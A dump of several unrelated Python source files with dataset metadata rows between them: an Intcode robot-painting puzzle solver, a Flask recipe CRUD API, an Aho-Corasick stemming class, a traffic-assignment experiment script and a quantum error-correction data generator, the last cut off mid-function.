code_list = [3, 8, 1005, 8, 339, 1106, 0, 11, 0, 0, 0, 104, 1, 104, 0, 3, 8, 1002, 8, -1, 10, 101, 1, 10, 10, 4, 10, 1008, 8, 0, 10, 4, 10, 1002, 8, 1, 29, 2, 1108, 11, 10, 1, 1, 20, 10, 2, 107, 6, 10, 3, 8, 102, -1, 8, 10, 101, 1, 10, 10, 4, 10, 108, 0, 8, 10, 4, 10, 101, 0, 8, 62, 1006, 0, 29, 1006, 0, 12, 1, 1101, 5, 10, 1, 2, 20, 10, 3, 8, 102, -1, 8, 10, 1001, 10, 1, 10, 4, 10, 1008, 8, 0, 10, 4, 10, 1001, 8, 0, 99, 1006, 0, 30, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 1008, 8, 0, 10, 4, 10, 1001, 8, 0, 124, 1006, 0, 60, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 1008, 8, 1, 10, 4, 10, 101, 0, 8, 149, 2, 1007, 2, 10, 1, 1105, 10, 10, 3, 8, 1002, 8, -1, 10, 101, 1, 10, 10, 4, 10, 108, 0, 8, 10, 4, 10, 101, 0, 8, 178, 1, 1108, 15, 10, 1, 1101, 5, 10, 1, 109, 8, 10, 1006, 0, 20, 3, 8, 102, -1, 8, 10, 1001, 10, 1, 10, 4, 10, 108, 1, 8, 10, 4, 10, 101, 0, 8, 215, 1006, 0, 61, 1006, 0, 16, 2, 1105, 15, 10, 1006, 0, 50, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 108, 1, 8, 10, 4, 10, 101, 0, 8, 250, 1, 1003, 10, 10, 1, 9, 19, 10, 2, 1004, 6, 10, 2, 1106, 2, 10, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 1008, 8, 1, 10, 4, 10, 101, 0, 8, 289, 1, 1103, 13, 10, 2, 105, 17, 10, 3, 8, 1002, 8, -1, 10, 1001, 10, 1, 10, 4, 10, 108, 1, 8, 10, 4, 10, 1002, 8, 1, 318, 101, 1, 9, 9, 1007, 9, 1086, 10, 1005, 10, 15, 99, 109, 661, 104, 0, 104, 1, 21101, 0, 825599304340,1, 21101, 356, 0, 0, 1106, 0, 460, 21101, 0, 937108545948, 1, 21102, 1, 367, 0, 1106, 0, 460, 3, 10, 104, 0, 104, 1, 3, 10, 104, 0, 104, 0, 3, 10, 104, 0, 104, 1, 3, 10, 104, 0, 104, 1, 3, 10, 104, 0, 104, 0, 3, 10, 104, 0, 104, 1, 21102, 1, 21628980315, 1, 21101, 0, 414, 0, 1105, 1, 460, 21101, 0, 3316673539, 1, 21101, 425, 0, 0, 1106, 0, 460, 3, 10, 104, 0, 104, 0, 3, 10, 104, 0, 104, 0, 21102, 988753428840, 1, 1, 21102, 1, 448, 0, 1106, 0, 460, 21102, 825544569700, 1, 1, 21102, 459, 1, 0, 1106, 0, 460, 99, 109, 2, 21202, -1, 1, 1, 21102, 1, 40, 2, 21102, 491, 1, 3, 21102, 481, 1, 0, 1105, 1, 
524, 109, -2, 2106, 0, 0, 0, 1, 0, 0, 1, 109, 2, 3, 10, 204, -1, 1001, 486, 487, 502, 4, 0, 1001, 486, 1, 486, 108, 4, 486, 10, 1006, 10, 518, 1101, 0, 0, 486, 109, -2, 2105, 1, 0, 0, 109, 4, 2102, 1, -1, 523, 1207, -3, 0, 10, 1006, 10, 541, 21102, 0, 1, -3, 21201, -3, 0, 1, 22102, 1, -2, 2, 21102, 1, 1, 3, 21102, 560, 1, 0, 1106, 0, 565, 109, -4, 2105, 1, 0, 109, 5, 1207, -3, 1, 10, 1006, 10, 588, 2207, -4, -2, 10, 1006, 10, 588, 22101, 0, -4, -4, 1105, 1, 656, 21202, -4, 1, 1, 21201, -3, -1, 2, 21202, -2, 2, 3, 21102, 1, 607, 0, 1106, 0, 565, 22102, 1, 1, -4, 21101, 0, 1, -1, 2207, -4, -2, 10, 1006, 10, 626, 21101, 0, 0, -1, 22202, -2, -1, -2, 2107, 0, -3, 10, 1006, 10, 648, 21202, -1, 1, 1, 21101, 0, 648, 0, 105, 1, 523, 21202, -2, -1, -2, 22201, -4, -2, -4, 109, -5, 2105, 1, 0]
def grid_maker(width, height):
    """Build a grid of '.' cells: `height` rows, each `width` columns wide."""
    return [['.'] * width for _ in range(height)]
def intcode_parse(code):
    """Split a raw intcode instruction into (opcode, parameter-mode digits).

    The opcode is the low two decimal digits.  The remaining digits are the
    parameter modes, returned least-significant first; trailing zero modes
    are omitted (parameter_code_sizer pads them back).
    """
    opcode = code % 100
    modes = []
    remainder = code // 100
    while remainder:
        remainder, digit = divmod(remainder, 10)
        modes.append(digit)
    return (opcode, modes)
def parameter_code_sizer(opcode, raw_parameter_code_list):
    """Pad the parameter-mode list in place with zeros up to the opcode's arity.

    Returns the same (mutated) list.  Raises KeyError for unknown opcodes.
    """
    arity_by_opcode = {1: 3, 2: 3, 3: 1, 4: 1,
                       5: 2, 6: 2, 7: 3, 8: 3, 9: 1, 99: 0}
    missing = arity_by_opcode[opcode] - len(raw_parameter_code_list)
    if missing > 0:
        raw_parameter_code_list.extend([0] * missing)
    return raw_parameter_code_list
def code_list_lengthener(code_list, parameter):
    """Grow code_list in place (zero-filled) so that index `parameter` is valid.

    Returns the same (mutated) list.
    """
    shortfall = parameter + 1 - len(code_list)
    if shortfall > 0:
        code_list.extend([0] * shortfall)
    return code_list
def parameter_tuple_maker(parameter_code, code_list, i):
    """Pair a parameter mode with the raw value found at position i of code_list."""
    return parameter_code, code_list[i]
def parameter_tuple_parser(parameter_tuple, code_list, relative_base):
    """Resolve a (mode, value) pair into the operand used by an opcode.

    Modes:
      0 -- position:  value is an address into code_list
      1 -- immediate: value is the operand itself
      2 -- relative:  value offset by relative_base is an address

    Intcode memory is unbounded and zero-initialised, so code_list is grown
    in place as needed and out-of-range reads return 0.
    """
    mode, value = parameter_tuple
    if mode == 1:
        return value
    if mode == 0:
        address = value
    elif mode == 2:
        address = value + relative_base
    else:
        print('And I oop.... parameter_tuple_parser')
        return None
    # BUG FIX: relative-mode (2) reads previously skipped the lengthening
    # step performed for position mode, raising IndexError on reads past
    # the current end of memory instead of returning 0.
    if address >= len(code_list):
        code_list.extend([0] * (address + 1 - len(code_list)))
    return code_list[address]
def color_coder(grid, current):
    """Return 0 for a black ('.') cell and 1 for a white ('#') cell at `current`."""
    cell = grid[current[0]][current[1]]
    if cell == '.':
        return 0
    if cell == '#':
        return 1
    print("And I oop...color_coder")
def intcode_one(parameter_list, code_list, relative_base):
    """Opcode 1 (add): store the sum of the first two operands at the
    destination named by the last parameter.  Returns True."""
    for idx in range(len(parameter_list) - 1):
        parameter_list[idx] = parameter_tuple_parser(
            parameter_list[idx], code_list, relative_base)
    dest_mode, dest_value = parameter_list[-1]
    total = parameter_list[0] + parameter_list[1]
    if dest_mode == 0:
        code_list_lengthener(code_list, dest_value)
        code_list[dest_value] = total
    elif dest_mode == 2:
        code_list_lengthener(code_list, dest_value + relative_base)
        code_list[dest_value + relative_base] = total
    else:
        print("And I oop... intcode_one")
    return True
def intcode_two(parameter_list, code_list, relative_base):
    """Opcode 2 (multiply): store the product of the first two operands at
    the destination named by the last parameter.  Returns True."""
    for idx in range(len(parameter_list) - 1):
        parameter_list[idx] = parameter_tuple_parser(
            parameter_list[idx], code_list, relative_base)
    dest_mode, dest_value = parameter_list[-1]
    product = parameter_list[0] * parameter_list[1]
    if dest_mode == 0:
        code_list_lengthener(code_list, dest_value)
        code_list[dest_value] = product
    elif dest_mode == 2:
        code_list_lengthener(code_list, dest_value + relative_base)
        code_list[dest_value + relative_base] = product
    else:
        print("And I oop...intcode_two")
    return True
def intcode_three(parameter_list, code_list, relative_base, grid, current):
    """Opcode 3 (input): read the colour under the robot (via color_coder)
    and store it at the destination named by the single parameter.
    Returns True."""
    number_in = color_coder(grid, current)
    dest_mode, dest_value = parameter_list[0]
    if dest_mode == 0:
        code_list_lengthener(code_list, dest_value)
        code_list[dest_value] = number_in
    elif dest_mode == 2:
        code_list_lengthener(code_list, dest_value + relative_base)
        code_list[dest_value + relative_base] = number_in
    else:
        print("And I oop...intcode_three")
    return True
def intcode_four(parameter_list, code_list, relative_base):
    """Opcode 4 (output): resolve every parameter and return the last one.

    Warns when the output is not a valid paint/turn instruction (0 or 1).
    """
    for idx, tup in enumerate(parameter_list):
        parameter_list[idx] = parameter_tuple_parser(tup, code_list, relative_base)
    output = parameter_list[-1]
    if output not in {0, 1}:
        print("And I oop...intcode_four")
    return output
def intcode_five(parameter_list, code_list, relative_base, i):
    """Opcode 5 (jump-if-true): return the new instruction pointer.

    Jumps to the second operand when the first is non-zero; otherwise the
    pointer i is returned unchanged.
    """
    for idx, tup in enumerate(parameter_list):
        parameter_list[idx] = parameter_tuple_parser(tup, code_list, relative_base)
    return parameter_list[-1] if parameter_list[0] != 0 else i
def intcode_six(parameter_list, code_list, relative_base, i):
    """Opcode 6 (jump-if-false): return the new instruction pointer.

    Jumps to the second operand when the first is zero; otherwise the
    pointer i is returned unchanged.
    """
    for idx, tup in enumerate(parameter_list):
        parameter_list[idx] = parameter_tuple_parser(tup, code_list, relative_base)
    return parameter_list[-1] if parameter_list[0] == 0 else i
def intcode_seven(parameter_list, code_list, relative_base):
    """Opcode 7 (less-than): store 1 at the destination when the first
    operand is less than the second, else 0.  Returns True."""
    for idx in range(len(parameter_list) - 1):
        parameter_list[idx] = parameter_tuple_parser(
            parameter_list[idx], code_list, relative_base)
    dest_mode, dest_value = parameter_list[-1]
    if dest_mode == 0:
        parameter_list[-1] = dest_value
    elif dest_mode == 2:
        parameter_list[-1] = dest_value + relative_base
    destination = parameter_list[-1]
    code_list_lengthener(code_list, destination)
    code_list[destination] = 1 if parameter_list[0] < parameter_list[1] else 0
    return True
def intcode_eight(parameter_list, code_list, relative_base):
    """Opcode 8 (equals): store 1 at the destination when the first operand
    equals the second, else 0.  Returns True."""
    for idx in range(len(parameter_list) - 1):
        parameter_list[idx] = parameter_tuple_parser(
            parameter_list[idx], code_list, relative_base)
    dest_mode, dest_value = parameter_list[-1]
    if dest_mode == 0:
        parameter_list[-1] = dest_value
    elif dest_mode == 2:
        parameter_list[-1] = dest_value + relative_base
    destination = parameter_list[-1]
    code_list_lengthener(code_list, destination)
    code_list[destination] = 1 if parameter_list[0] == parameter_list[1] else 0
    return True
def intcode_nine(parameter_list, code_list, relative_base):
    """Opcode 9: offset the relative base by the single operand and return
    the new base."""
    for idx, tup in enumerate(parameter_list):
        parameter_list[idx] = parameter_tuple_parser(tup, code_list, relative_base)
    return relative_base + parameter_list[0]
def intcode_ninetynine(parameter_list, code_list):
    """Opcode 99 (halt): signal the main loop to stop by returning False.

    Both parameters are accepted for dispatch uniformity and ignored.
    """
    return False
def robot_paint(grid, painted_locations, current, instruction_list):
    """Paint the robot's current cell: 0 paints black ('.'), 1 paints white ('#').

    Records the cell in painted_locations.  Returns (grid, painted_locations);
    both are mutated in place.
    """
    painted_locations.add(current)
    row, col = current
    paint_code = instruction_list[0]
    if paint_code == 0:
        grid[row][col] = '.'
    elif paint_code == 1:
        grid[row][col] = '#'
    else:
        print('And I oop...robot_paint')
    return grid, painted_locations
def robot_move(current, direction):
    """Advance one cell in the facing direction (0=up, 1=right, 2=down, 3=left).

    Unknown directions leave `current` unchanged after printing a warning.
    """
    steps = {0: (-1, 0), 1: (0, 1), 2: (1, 0), 3: (0, -1)}
    if direction in steps:
        d_row, d_col = steps[direction]
        current = (current[0] + d_row, current[1] + d_col)
    else:
        print("And I oop...robot_move")
    return current
def robot_turn(direction, instruction_list):
    """Rotate the robot: instruction 0 turns left, 1 turns right.

    Directions wrap modulo 4 (0=up, 1=right, 2=down, 3=left).
    """
    turn = instruction_list[1]
    if turn == 0:
        return (direction - 1) % 4
    if turn == 1:
        return (direction + 1) % 4
    print("And I oop....robot_do_it (2)")
    return direction % 4
def robot_do_it(grid, painted_locations, current, direction, instruction_list):
    """One full robot step: paint the current cell, then turn, then move.

    Returns the updated (grid, painted_locations, current, direction).
    """
    grid, painted_locations = robot_paint(
        grid, painted_locations, current, instruction_list)
    new_direction = robot_turn(direction, instruction_list)
    new_position = robot_move(current, new_direction)
    return grid, painted_locations, new_position, new_direction
# Create grid for the hull-painting robot to move over.
height = 1000
width = 1000
# NOTE(review): grid_maker's signature is (width, height) but it is called
# here as (height, width).  Harmless only because height == width -- confirm.
grid = grid_maker(height, width)
# Initialize placement and direction
current = (height//2, width//2)  # robot starts in the middle of the grid
direction = 0  # 0=up, 1=right, 2=down, 3=left
i = 0  # instruction pointer into code_list
relative_base = 0  # base address for relative-mode (mode 2) parameters
instruction_list = []  # buffers output pairs: [paint colour, turn]
painted_locations = set()  # every cell painted at least once
keep_going = True
while keep_going:
    # Run the intcode machine until it has emitted two outputs (one paint
    # instruction and one turn instruction).
    # NOTE(review): if the program halts (opcode 99) before two outputs are
    # buffered, this inner loop keeps executing past the halt -- works for
    # this puzzle input, but fragile.
    while len(instruction_list) < 2:
        # reads raw opcode
        raw_opcode = code_list[i]
        i += 1
        # does intcode operation direction parsing
        (opcode, raw_parameter_code_list) = intcode_parse(raw_opcode)
        # Ensure the parameter code list is correct length for the code.
        parameter_code_list = parameter_code_sizer(
            opcode, raw_parameter_code_list)
        # Create actual list of parameters for each opcode operation
        parameter_list = []
        # grabs parameters, as necessary, advancing the pointer past them
        index = 0
        while len(parameter_list) < len(parameter_code_list):
            parameter_list.append(parameter_tuple_maker(
                parameter_code_list[index], code_list, i))
            i += 1
            index += 1
        # Dispatch on the opcode: 5/6 may move the instruction pointer,
        # 9 adjusts the relative base, 4 buffers an output, 99 halts.
        if opcode == 1:
            intcode_one(parameter_list, code_list, relative_base)
        elif opcode == 2:
            intcode_two(parameter_list, code_list, relative_base)
        elif opcode == 3:
            intcode_three(parameter_list, code_list,
                          relative_base, grid, current)
        elif opcode == 4:
            instruction_list.append(intcode_four(
                parameter_list, code_list, relative_base))
        elif opcode == 5:
            i = intcode_five(parameter_list, code_list, relative_base, i)
        elif opcode == 6:
            i = intcode_six(parameter_list, code_list, relative_base, i)
        elif opcode == 7:
            intcode_seven(parameter_list, code_list, relative_base)
        elif opcode == 8:
            intcode_eight(parameter_list, code_list, relative_base)
        elif opcode == 9:
            relative_base = intcode_nine(
                parameter_list, code_list, relative_base)
        elif opcode == 99:
            keep_going = intcode_ninetynine(parameter_list, code_list)
        else:
            print('and I oop... opcode error')
    # We have two instructions: paint the cell, then turn and move.
    grid, painted_locations, current, direction = robot_do_it(
        grid, painted_locations, current, direction, instruction_list)
    instruction_list = []
# Answer: number of distinct cells painted at least once.
print(len(painted_locations))
| 43.406877
| 2,789
| 0.634629
|
4a021eb85ed52b336da356d90c3864cc6af5180e
| 6,471
|
py
|
Python
|
app/api/recipe_routes.py
|
michael-gann/larder
|
3de59ef5b403215e42858ee4007bc7926506478c
|
[
"Unlicense"
] | null | null | null |
app/api/recipe_routes.py
|
michael-gann/larder
|
3de59ef5b403215e42858ee4007bc7926506478c
|
[
"Unlicense"
] | 2
|
2021-03-05T18:48:56.000Z
|
2021-03-05T18:51:49.000Z
|
app/api/recipe_routes.py
|
michael-gann/larder
|
3de59ef5b403215e42858ee4007bc7926506478c
|
[
"Unlicense"
] | null | null | null |
from flask import Blueprint, jsonify, request
from app.models import Recipe, RecipeStep, RecipeIngredient, db
from sqlalchemy.orm import selectinload
from app.forms import RecipeForm
recipe_routes = Blueprint('recipes', __name__)
@recipe_routes.route("", methods=["GET"])  # get all recipes by current user
def recipes():
    """Return every recipe owned by the user in the ?userId= query string.

    Each recipe is wrapped as {recipe_id: recipe} with its ingredients
    (plus their ingredient/measurement rows) and steps expanded inline.
    """
    userId = request.args.get("userId")
    recipes_query = (
        Recipe.query.filter_by(user_id=userId)
        .options(selectinload(Recipe.recipe_ingredients),
                 selectinload(Recipe.recipe_steps))
        .all()
    )
    expanded = []
    for r in recipes_query:
        ingredients = []
        for ri in r.recipe_ingredients:
            entry = {**ri.to_dict()}
            entry["ingredient"] = ri.ingredients.to_dict()
            entry["measurement"] = ri.measurements.to_dict()
            ingredients.append(entry)
        recipe_dict = {**r.to_dict()}
        recipe_dict["ingredients"] = ingredients
        recipe_dict["steps"] = [s.to_dict() for s in r.recipe_steps]
        expanded.append(recipe_dict)
    recipes_by_id = [{recipe["id"]: {**recipe}} for recipe in expanded]
    return jsonify(recipes_by_id)
@recipe_routes.route("/5", methods=["GET"])
def something():
    # Placeholder handler for GET /5 with an empty body.
    # NOTE(review): appears intended to intercept id 5 before the dynamic
    # /<int:id> route below -- confirm intent; otherwise remove.
    pass
@recipe_routes.route("/<int:id>", methods=["GET"])  # get a single recipe by ID
def recipe(id):
    """Return one recipe with ingredients and steps expanded inline, or
    {"exists": False} when no recipe has the given id."""
    found = Recipe.query.options(
        selectinload(Recipe.recipe_ingredients),
        selectinload(Recipe.recipe_steps)).get(id)
    if found is None:
        return {"exists": False}
    ingredients = []
    for ri in found.recipe_ingredients:
        item = {**ri.to_dict()}
        item["ingredient"] = ri.ingredients.to_dict()
        item["measurement"] = ri.measurements.to_dict()
        ingredients.append(item)
    payload = {**found.to_dict()}
    payload["ingredients"] = ingredients
    payload["steps"] = [s.to_dict() for s in found.recipe_steps]
    return payload
@recipe_routes.route("", methods=["POST"])  # commit a recipe to the db
def post_recipes():
    """Create a recipe, or fully replace one when form.recipe_id is set.

    Expects a RecipeForm payload plus a csrf_token cookie.  Returns the
    saved recipe keyed by its id, or a generic 500 when validation fails.
    """
    # TODO: data validation
    form = RecipeForm()
    # WTForms CSRF protection: copy the token from the cookie into the form.
    form['csrf_token'].data = request.cookies['csrf_token']
    if form.validate_on_submit():
        # A recipe_id in the payload means "edit": child rows are deleted
        # and re-created from scratch rather than diffed.
        is_edit = form.recipe_id.data is not None
        if is_edit:
            recipe_ingredients_to_delete = RecipeIngredient.query.filter_by(
                recipe_id=form.recipe_id.data).all()
            recipe_steps_to_delete = RecipeStep.query.filter_by(
                recipe_id=form.recipe_id.data).all()

            for ri in recipe_ingredients_to_delete:
                db.session.delete(ri)
            for rs in recipe_steps_to_delete:
                db.session.delete(rs)

            # Update the parent row in place.
            recipe_to_edit = Recipe.query.get(form.recipe_id.data)
            recipe_to_edit.name = form.name.data
            recipe_to_edit.content = form.content.data
            db.session.add(recipe_to_edit)

            for ingredient in form.ingredients.entries:
                recipe_ingredient = RecipeIngredient(
                    recipe_id=form.recipe_id.data,
                    ingredient_id=ingredient.ingredient_id.data,
                    measurement_id=ingredient.measurement_id.data,
                    quantity=ingredient.quantity.data
                )
                db.session.add(recipe_ingredient)

            # NOTE(review): the loop variable `step` is immediately rebound
            # to the new RecipeStep instance, shadowing the form entry.
            for step in form.steps.entries:
                step = RecipeStep(
                    recipe_id=form.recipe_id.data,
                    step_number=step.step_number.data,
                    content=step.content.data
                )
                db.session.add(step)

            # One commit covers the child deletes and all re-inserts.
            db.session.commit()

            # Re-query with eager loading so the response can expand children.
            editted_recipe_query = Recipe.query.options(selectinload(
                Recipe.recipe_ingredients),
                selectinload(Recipe.recipe_steps)).get(form.recipe_id.data)

            editted_recipe_expanded = {**editted_recipe_query.to_dict(),
                                       "ingredients": [
                                           {**i.to_dict(),
                                            "ingredient": i.ingredients.to_dict(),
                                            "measurement": i.measurements.to_dict()}
                                           for i in editted_recipe_query.recipe_ingredients
                                       ],
                                       "steps":
                                       [s.to_dict() for s in editted_recipe_query.recipe_steps]
                                       }

            editted_recipe = {
                editted_recipe_expanded["id"]: editted_recipe_expanded}

            return editted_recipe

        # Create path: commit the parent first so recipe.id exists for the
        # child rows inserted below.
        recipe = Recipe(
            user_id=form.user_id.data,
            name=form.name.data,
            content=form.content.data
        )
        db.session.add(recipe)
        db.session.commit()

        for ingredient in form.ingredients.entries:
            recipe_ingredient = RecipeIngredient(
                recipe_id=recipe.id,
                ingredient_id=ingredient.ingredient_id.data,
                measurement_id=ingredient.measurement_id.data,
                quantity=ingredient.quantity.data
            )
            db.session.add(recipe_ingredient)

        # NOTE(review): `step` is rebound inside the loop, as in the edit path.
        for step in form.steps.entries:
            step = RecipeStep(
                recipe_id=recipe.id,
                step_number=step.step_number.data,
                content=step.content.data
            )
            db.session.add(step)
        db.session.commit()

        new_recipe_query = Recipe.query.options(selectinload(
            Recipe.recipe_ingredients), selectinload(Recipe.recipe_steps)).get(recipe.id)

        new_recipe = {**new_recipe_query.to_dict(),
                      "ingredients": [
                          {**i.to_dict(),
                           "ingredient": i.ingredients.to_dict(),
                           "measurement": i.measurements.to_dict()}
                          for i in new_recipe_query.recipe_ingredients
                      ],
                      "steps": [s.to_dict() for s in new_recipe_query.recipe_steps]
                      }

        new_recipe_by_id = {new_recipe["id"]: new_recipe}
        return new_recipe_by_id
    # Validation failed (bad CSRF or fields); details are not surfaced.
    return {'errors': ['Internal Server Error']}, 500
@recipe_routes.route("/<int:id>", methods=["DELETE"])
def delete_recipe(id):
    """Delete a recipe plus its dependent ingredient and step rows.

    Aborts with 404 when the recipe does not exist; otherwise commits the
    cascade manually and responds {"success": True}.
    """
    doomed_ingredients = RecipeIngredient.query.filter_by(recipe_id=id).all()
    doomed_steps = RecipeStep.query.filter_by(recipe_id=id).all()
    doomed_recipe = Recipe.query.get_or_404(id)

    for child in doomed_ingredients + doomed_steps:
        db.session.delete(child)
    db.session.delete(doomed_recipe)
    db.session.commit()
    return {"success": True}
| 31.720588
| 89
| 0.585845
|
4a021fe2a484633fe2cfe8d9ed27170762c3c767
| 2,623
|
py
|
Python
|
glearn/crf/stemmed.py
|
WeiShiwei/tornado_glearn
|
5e74bbaaee4d2b8c5abf3b60cffbe54694a3bc6f
|
[
"Apache-2.0"
] | null | null | null |
glearn/crf/stemmed.py
|
WeiShiwei/tornado_glearn
|
5e74bbaaee4d2b8c5abf3b60cffbe54694a3bc6f
|
[
"Apache-2.0"
] | null | null | null |
glearn/crf/stemmed.py
|
WeiShiwei/tornado_glearn
|
5e74bbaaee4d2b8c5abf3b60cffbe54694a3bc6f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
import collections
from time import time
from datetime import datetime
sys.path.append( os.path.join( os.path.abspath(os.path.dirname(__file__)) , '../../dependence'))
# from trie import Trie
# RIGHT_SYMBOL = '@'
from distutils.util import get_platform
sys.path.insert(0, "ahocorasick-0.9/build/lib.%s-%s" % (get_platform(), sys.version[0:3]))
import ahocorasick
import ahocorasick.graphviz
sys.path.append( os.path.join( os.path.abspath(os.path.dirname(__file__)) , '../..'))
from glearn.sqlite import orm
reload(sys) #
sys.setdefaultencoding('utf-8') #
class Stemmed(object):
    """Aho-Corasick based keyword replacer.

    Builds a keyword automaton over all known words (word -> stem pairs
    loaded from the CrfStemmed table) and rewrites documents by substituting
    each matched word with its stem.

    NOTE(review): Python 2 only -- relies on `unicode` and implicit
    bytes/str mixing in `stemming`.
    """
    def __init__(self):
        super(Stemmed, self).__init__()
        # Keyword automaton over all known words.
        self.tree = ahocorasick.KeywordTree()
        # word -> stem lookup; missing words map to the empty string.
        self.word_stem_dict = collections.defaultdict(str)
        self.__load_crf_stemmed()
        # Sentinel "last refreshed" timestamp, far in the past; used by the
        # commented-out cache-invalidation logic below.
        self.stemmed_updatedTime = datetime(2000, 8, 6, 6, 29, 51, 144126)

    def __load_crf_stemmed(self):
        # (Re)build the keyword tree from the CrfStemmed table.
        print('\n'+'=' * 80)
        print("Ahocorasick KeywordTree Making: ")
        print(self.tree)
        t0 = time()
        self.tree = ahocorasick.KeywordTree()
        self.word_stem_dict = orm.CrfStemmed.get_word_stem_dict()
        all_key_words = self.word_stem_dict.keys()
        for word in all_key_words:
            self.tree.add(word)
        self.tree.make()

    def stemming(self, doc):
        """Generalised stemming: replace every keyword match in *doc* with
        its stem and return the rewritten document."""
        # CrfStemmed_updatedTime = orm.CrfStemmed.fetch_latest_updated_time()
        # if CrfStemmed_updatedTime != self.stemmed_updatedTime:
        #     self.__load_crf_stemmed()
        #     self.stemmed_updatedTime = CrfStemmed_updatedTime
        doc_res = ''
        if isinstance(doc, unicode):
            doc = doc.encode('utf-8')
        left_margin = 0
        # Walk matches left to right, copying the unmatched gaps verbatim
        # and substituting each matched word with its stem.
        for match in self.tree.findall(doc):
            beg,end = int(match[0]),int(match[1])
            word = unicode(doc[beg:end].strip())
            stem = self.word_stem_dict[word]
            doc_res += doc[left_margin:beg]+stem
            left_margin = end
        doc_res += doc[left_margin:]
        return doc_res

    # def stemming_docs(self, docs):
    #     """ 广义的词干化 """
    #     CrfStemmed_updatedTime = orm.CrfStemmed.fetch_latest_updated_time()
    #     if CrfStemmed_updatedTime != self.stemmed_updatedTime:
    #         self.__load_crf_stemmed()
    #         self.stemmed_updatedTime = CrfStemmed_updatedTime
    #     docs = [self.stemming(docs[i]) for i in xrange(len(docs))]
    #     return docs
def main():
    """Smoke test: instantiate Stemmed and stem two sample documents.

    NOTE(review): Python 2 only (print statements below).
    """
    t0 = time()
    stem = Stemmed()
    print("Stemmed Instantiated done in %fs" % (time() - t0))
    doc = u'螺纹钢<ZJM>φ14mm</ZJM> <PH>HRB400</PH>' # 'utf-8'
    doc_res = stem.stemming(doc)# "螺纹钢Φ12mm"
    print doc_res
    doc = u'3×120+1' # 'utf-8'
    doc_res = stem.stemming(doc)# "螺纹钢Φ12mm"
    print doc_res

if __name__ == "__main__":
    main()
| 27.322917
| 96
| 0.693481
|
4a0220b9e920197af0cb4a90b5c4983898f5736c
| 618
|
py
|
Python
|
experiments/test_trafficAssignment.py
|
salomonw/mixed-traffic-amod-route-rebalance
|
7f1edeb195a7bfab835e596ad84deead2957943e
|
[
"MIT"
] | 1
|
2022-03-07T16:15:56.000Z
|
2022-03-07T16:15:56.000Z
|
experiments/test_trafficAssignment.py
|
salomonw/mixed-traffic-amod-route-rebalance
|
7f1edeb195a7bfab835e596ad84deead2957943e
|
[
"MIT"
] | null | null | null |
experiments/test_trafficAssignment.py
|
salomonw/mixed-traffic-amod-route-rebalance
|
7f1edeb195a7bfab835e596ad84deead2957943e
|
[
"MIT"
] | null | null | null |
import src.tnet as tnet
import src.CARS as cars

# Smoke test: compare a plain MSA traffic assignment against the CARS
# (no-rebalancing) assignment on the small 'Braess1' test network.
netFile, gFile, fcoeffs = tnet.get_network_parameters('Braess1')
tNet = tnet.tNet(netFile=netFile, gFile=gFile, fcoeffs=fcoeffs)

# User-equilibrium assignment via the method of successive averages.
tNet.solveMSA()
print([(i,j, tNet.G[i][j]['flow']) for i,j in tNet.G.edges()])

# Re-solve with the CARS formulation (no rebalancing) on the supergraph.
tNet.build_supergraph()
tNet = cars.solve_CARS_noRebalancing(tNet, exogenous_G=0, fcoeffs=fcoeffs, xa=1)
print([(i,j, tNet.G_supergraph[i][j]['flow']) for i,j in tNet.G.edges()])

# Ratio of the MSA total travel time to the CARS no-rebalancing total.
# NOTE(review): confirm this matches the intended "price of anarchy"
# definition (which baseline is the optimum).
exogObj = tnet.get_totalTravelTime(tNet.G, fcoeffs)
amodObjNoRebalancing = cars.get_totalTravelTime(tNet)
priceOfAnarchy = exogObj / amodObjNoRebalancing
print(priceOfAnarchy)
| 29.428571
| 80
| 0.755663
|
4a022140425bf99bbbc8d131968824bbdce4c1b5
| 3,524
|
py
|
Python
|
qecc/analyzer.py
|
huitaoshen/stabilizer-qecc-simulator
|
a4a551a588bd70a6978b8b136d7fade26eaaff7d
|
[
"MIT"
] | 11
|
2019-05-07T23:04:19.000Z
|
2021-12-15T05:44:54.000Z
|
qecc/analyzer.py
|
huitaoshen/stabilizer-qecc-simulator
|
a4a551a588bd70a6978b8b136d7fade26eaaff7d
|
[
"MIT"
] | null | null | null |
qecc/analyzer.py
|
huitaoshen/stabilizer-qecc-simulator
|
a4a551a588bd70a6978b8b136d7fade26eaaff7d
|
[
"MIT"
] | null | null | null |
from qecc.StabilizerCode import StabilizerCode
from typing import Callable
import numpy as np
import csv
def generate_training_data(file_name: str, n: int, code: StabilizerCode, error_correction_method: str,
                           error_model: Callable, *args, **kwds):
    """
    Generate [syndrome history, logical error] rows as training data for a
    stabilizer code under the given error model, saved as a CSV file.

    Args:
        file_name: The file name where the histories are saved as a csv file.
        n: Number of different histories to be generated.
        code: The stabilizer code based on which the history is to be generated.
        error_correction_method: The logical error is only well-defined for physical errors with no syndromes. This is
            the method name of code that is used to first eliminate the last syndrome.
        error_model: The callable that generates the error history.
        *args, **kwds: Positional or keyword arguments that are passed to the error model.
    """
    # BUG FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin int is the documented replacement.
    last_phys_err = np.zeros([2 * code.n, 1], dtype=int)
    # getattr is the idiomatic form of code.__getattribute__(name); resolve
    # the correction method once, outside the loop.
    correct = getattr(code, error_correction_method)
    # newline='' is required by the csv module to avoid blank rows on Windows.
    with open(file_name, 'w', newline='') as file:
        csv_writer = csv.writer(file)
        for _ in range(n):
            phys_error_his = error_model(*args, **kwds)
            last_phys_err[:] = np.reshape(phys_error_his[:, -1], [-1, 1])
            # Cancel the final syndrome so the residual logical error is
            # well-defined.
            last_phys_err += correct(code.phys_err_to_syndrome(last_phys_err))
            csv_writer.writerows(
                [np.transpose(code.phys_err_to_syndrome(phys_error_his)).flatten().tolist()
                 + [code.phys_err_to_logic_err(last_phys_err)]])
def last_syndrome_analyze_table(file_name: str, num: int, code: StabilizerCode):
    """
    Given syndrome histories read from a file, count and build a
    last-`num`-syndromes ~ logical-error table of size
    2 ** (num * (n - k)) x 4 ** k, then print naive and best-case
    correction rates.

    Args:
        file_name: The file name where the histories are to be imported.
        num: Number of trailing syndromes to analyze.
        code: The stabilizer code based on which the history was generated.
    """
    def logic_err_str_to_idx(logic: str) -> int:
